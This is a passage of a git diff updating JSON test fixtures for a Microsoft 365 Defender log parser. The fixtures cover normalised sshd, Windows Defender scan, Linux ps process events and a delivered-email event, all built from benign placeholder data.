"-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + "working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json index 7d72e6264..5a90081c8 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json @@ -30,6 +30,7 @@ "InitiatingProcessVersionInfoProductVersion": "4.18.2301.6", "LogonId": "999", "ProcessIntegrityLevel": "System", + "ProcessTokenElevation": "TokenElevationTypeDefault", "ProcessVersionInfoCompanyName": "Microsoft Corporation", "ProcessVersionInfoFileDescription": "Microsoft Malware Protection Command Line Utility", "ProcessVersionInfoInternalFileName": "MpCmdRun", @@ -69,31 +70,33 @@ "54", "Scan" ], - "code_signature": { - "status": "Valid", - "subject_name": "OsVendor" - }, "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54", - "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", - "hash": { - "md5": "5d5608654828cf052ba013b3c37cbb61", - "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", - "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" - }, - "name": "MsMpEng.exe", + "name": "MpCmdRun.exe", "parent": { - "name": "services.exe", - "pid": 1032, - "start": "2023-01-03T08:51:26.740241Z" + "code_signature": { + "status": "Valid", + "subject_name": "OsVendor" + }, + "command_line": "\"MsMpEng.exe\"", + "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe", + "hash": { + "md5": "5d5608654828cf052ba013b3c37cbb61", + "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae", + "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e" + }, + "name": "MsMpEng.exe", + "pid": 5456, + "start": "2023-01-03T08:51:29.269279Z", + "user": { + "domain": "NT", + "id": "S-1-1-11", + "name": "System" + }, + "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" }, "pid": 37788, "start": "2023-01-04T14:15:10.355033Z", - "user": { - "domain": "NT", - "id": "S-1-1-11", - "name": "System" - }, - "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0" + "working_directory": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index d2e83b32a..9b0327128 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -1,6 +1,12 @@ { "input": { - "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}" + "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } }, "expected": { "message": "{\"time\": \"2024-10-22T15:10:39.1954172Z\", \"tenantId\": \"793abec2-9e48-4d04-b341-59b054c49348\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceProcessEvents\", \"_TimeReceivedBySvc\": \"2024-10-22T15:10:13.8421815Z\", \"properties\": {\"InitiatingProcessSHA1\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessMD5\": null, \"InitiatingProcessFileName\": \"\", \"InitiatingProcessParentFileName\": \"\", \"InitiatingProcessFolderPath\": null, \"InitiatingProcessCommandLine\": \"\", \"SHA1\": \"a94a8fe5ccb19ba61c4c0873d391e987982fbbd3\", \"FileSize\": 144632, \"MD5\": \"098f6bcd4621d373cade4e832627b4f6\", \"FolderPath\": \"/usr/bin/ps\", \"ProcessCommandLine\": \"/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers\", \"FileName\": \"ps\", \"ProcessId\": 423627, \"InitiatingProcessId\": 423627, \"ProcessCreationTime\": \"2024-10-22T15:09:44.594155Z\", \"DeviceName\": \"computer.intranet.example\", \"DeviceId\": \"86dd1cf45142e904cb2e99c2721fac3ca198c6ca\", \"InitiatingProcessCreationTime\": \"2024-10-22T15:09:44.59Z\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"computer\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessSignatureStatus\": \"Unknown\", \"InitiatingProcessSignerType\": \"Unknown\", \"InitiatingProcessParentId\": 0, \"ReportId\": 67417, \"InitiatingProcessParentCreationTime\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"AccountDomain\": \"computer\", \"AccountName\": \"root\", \"ProcessTokenElevation\": \"None\", \"ProcessIntegrityLevel\": null, \"AccountSid\": null, \"AppGuardContainerId\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"InitiatingProcessSHA256\": null, \"InitiatingProcessLogonId\": 0, \"LogonId\": 0, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"AccountUpn\": null, \"AccountObjectId\": null, \"AdditionalFields\": \"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"InitiatingProcessPosixProcessGroupId\\\":423627,\\\"InitiatingProcessPosixSessionId\\\":180264,\\\"InitiatingProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591},\\\"ProcessPosixProcessGroupId\\\":423627,\\\"ProcessPosixSessionId\\\":180264,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/opt/microsoft/mdatp/sbin\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"DomainName\\\":\\\"computer\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"mdatp\\\",\\\"PosixGroupId\\\":591}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"root\\\",\\\"PosixGroupId\\\":0}}\", \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"ProcessVersionInfoCompanyName\": null, \"ProcessVersionInfoProductName\": null, \"ProcessVersionInfoProductVersion\": null, \"ProcessVersionInfoInternalFileName\": null, \"ProcessVersionInfoOriginalFileName\": null, \"ProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"CreatedProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"ActionType\": \"ProcessCreated\", \"Timestamp\": \"2024-10-22T15:09:44.594155Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", @@ -49,20 +55,23 @@ "-o", "comm,pid,pcpu,pmem,rss,etimes" ], - "code_signature": { - "status": "Unknown", - "subject_name": "Unknown" - }, "command_line": "/bin/ps -A -o comm,pid,pcpu,pmem,rss,etimes --no-headers", + "name": "ps", "parent": { - "pid": 0 + "code_signature": { + "status": "Unknown", + "subject_name": "Unknown" + }, + "pid": 423627, + "start": "2024-10-22T15:09:44.590000Z", + "user": { + "domain": "computer", + "name": "root" + } }, "pid": 423627, "start": "2024-10-22T15:09:44.594155Z", - "user": { - "domain": "computer", - "name": "root" - } + "working_directory": "/usr/bin" }, "related": { "hash": [ diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:31:34.1371671Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-EmailEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:18:40.3469550Z\",\"properties\":{\"ReportId\":\"12345678-abcd-ef09-1234-123456abcdef-abcdef1234567890ab-c\",\"NetworkMessageId\":\"12345678-1234-abcd-ef90-abcdef123456\",\"InternetMessageId\":\"<1@eu-west-1.test.com>\",\"Timestamp\":\"2024-10-28T14:18:40Z\",\"EmailClusterId\":3162398878,\"SenderIPv4\":\"1.2.3.4\",\"SenderIPv6\":null,\"SenderMailFromAddress\":\"john.doe@company.com\",\"SenderFromAddress\":\"john.doe@company.com\",\"SenderMailFromDomain\":\"company.com\",\"SenderFromDomain\":\"company.com\",\"RecipientEmailAddress\":\"alan.smithee@company.com\",\"Subject\":\"MAIL subject\",\"EmailDirection\":\"Inbound\",\"DeliveryAction\":\"Delivered\",\"DeliveryLocation\":\"Inbox/folder\",\"EmailAction\":null,\"EmailActionPolicy\":null,\"EmailActionPolicyGuid\":null,\"AttachmentCount\":0,\"UrlCount\":0,\"EmailLanguage\":\"en\",\"RecipientObjectId\":\"abcd1234-abcd-1234-ef90-123456abcdef\",\"SenderObjectId\":null,\"SenderDisplayName\":null,\"ThreatNames\":null,\"ThreatTypes\":null,\"DetectionMethods\":null,\"Connectors\":\"Relai SMTP interne\",\"OrgLevelAction\":\"Allow\",\"OrgLevelPolicy\":\"Connection policy\",\"UserLevelAction\":null,\"UserLevelPolicy\":null,\"ConfidenceLevel\":null,\"AdditionalFields\":null,\"AuthenticationDetails\":\"{\\\"SPF\\\":\\\"pass\\\",\\\"DKIM\\\":\\\"none\\\",\\\"DMARC\\\":\\\"pass\\\"}\",\"BulkComplaintLevel\":null},\"Tenant\":\"DefaultTenant\"}", + "event": { + "action": "Delivered", + "category": [ + "connection", + "email" + ], + "dataset": "email_events", + "type": [ + "allowed", + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:40Z", 